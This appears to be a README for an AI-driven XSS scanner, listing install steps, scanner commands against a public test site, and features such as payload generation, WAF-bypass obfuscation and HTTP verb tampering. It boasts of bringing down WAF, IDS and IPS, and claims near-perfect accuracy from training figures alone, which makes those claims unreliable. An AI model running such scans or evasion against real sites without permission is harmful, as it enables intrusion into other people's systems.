World's first Artificial Intelligence (XSS) Cross Site Scripting powered by Machine Learning with extreme fine-tuning designed to detect Reflected, Stored, DOM, and Blind (XSS) vulnerabilities in servers/apps at RFC design, forms, crawls, and through advanced AI techniques with deep and reinforcement learning, (NLP) and automatic payload generation.
Created and designed by Haroon Ahmad Awan.
Save the following content as requirements.txt
in the root directory of your project:
numpy
scipy
scikit-learn
pandas
tensorflow
keras
sqlalchemy
flask
beautifulsoup4
requests
lxml
python3 -m venv venv
source venv/bin/activate
venv\Scripts\activate
pip install -r requirements.txt
python xssscanadv.py
Includes built-in obfuscation methods to automatically check if we successfully bypassed the firewall. Results are then recorded into trained data, enhancing the detection and accuracy of payloads to identify more vulnerabilities.
Built-in HTTP verb tampering to check for vulnerabilities, using known and unknown HTTP verbs.
Utilizes neural networks to predict vulnerabilities based on complex features.
Trains models on past scan results and uses them to filter and prioritize URLs for scanning.
Analyzes web page content to identify forms and input fields that could be susceptible to XSS attacks.
Extracts details of forms and input fields to better target XSS injection points.
Learns from each scanning attempt to improve payload selection and application over time.
Adjusts future payload selection based on the success of past attempts.
Generates sophisticated XSS payloads dynamically based on the structure of the web page.
Provides tailored payloads for different server types (e.g., nginx, apache, IIS).
Fetches additional URLs using CommonCrawl and Wayback Machine to ensure comprehensive coverage.
Focuses on URLs likely to be vulnerable based on predictive models.
Detects blind XSS vulnerabilities and can use custom endpoints to detect real-time blind XSS, training the software for more accuracy in future scans. Types include:
- Server-Side Blind XSS
- Client-Side Blind XSS
- HTTP verb tampering based Blind XSS
- Server Parameter Tampering for Blind XSS
Identifies reflected XSS vulnerabilities and their subtypes by analyzing the immediate reflection of payloads. Types include:
- GET-Based Reflected XSS
- POST-Based Reflected XSS
- URL-Based Reflected XSS
- HTTP verb tampering based Reflected XSS
- Server Parameter Tampering for Reflected XSS
Detects stored XSS vulnerabilities by inspecting whether payloads are saved and executed later within the web application. Types include:
- Database Stored XSS
- File Stored XSS
- HTML Stored XSS
- HTTP verb tampering based Stored XSS
- Server Parameter Tampering for Stored XSS
Logs all scan results in a SQLite database for easy access and analysis.
Go to https://inloop.github.io/sqlite-viewer/# and import the .db file to see what's going on after you have finished scanning with success and failure ratios(intended for expert users only)
Generates detailed HTML reports summarizing the scan results and vulnerabilities found.
Utilizes multi-threading to scan multiple URLs simultaneously, improving scanning speed and efficiency.
python xssscanadv.py -d http://testphp.vulnweb.com --crawl
python xssscanadv.py -d http://testphp.vulnweb.com --crawl --report report.html
python xssscanadv.py -l crawled_urls.txt -t 100 --duration 3600 -s --mode autounderstand --use-model --report report.html
python xssscanadv.py -d http://testphp.vulnweb.com --extractquick
python xssscanadv.py -l testphp_vulnweb_com_cleaned_urls.txt -t 100 --duration 3600 -s --mode autounderstand --use-model --report report.html
python xssscanadv.py -d http://testphp.vulnweb.com --deepcrawl
python xssscanadv.py -l found_links.txt -t 100 --duration 3600 -s --mode autounderstand --use-model --report report.html
- We have initiated Auto Understand Mode for Random Forest Model and Neural Language Processing Capabilities
- This will train the model, train models only have tweaked algorithms like x and y, 0 and 1
- We have raw data with training_data.csv, that imported raw data
- Then we have NLP check to analysis and correct the data
- We have corellated with the Machine Learning Auto Understand Mode for Extreme Fine Tuning
- Once the software stops
- Congratulations! You have trained the model,
- To use model, use --use-model
- Bring down WAF, IDS, IPS and Everything basically
- Enjoy!
- High Accuracy: The accuracy remains consistently high, around 98.7% to 99.0%, throughout the training epochs. This indicates that the model is performing well on the training data.
- Low Loss: The loss values are relatively low, starting from 0.1046 and decreasing to around 0.0423 - 0.0509. Lower loss values indicate that the model's predictions are close to the actual values.
- Stability: The accuracy and loss values do not fluctuate wildly between epochs, suggesting that the model is not overfitting and is learning the patterns in the data effectively.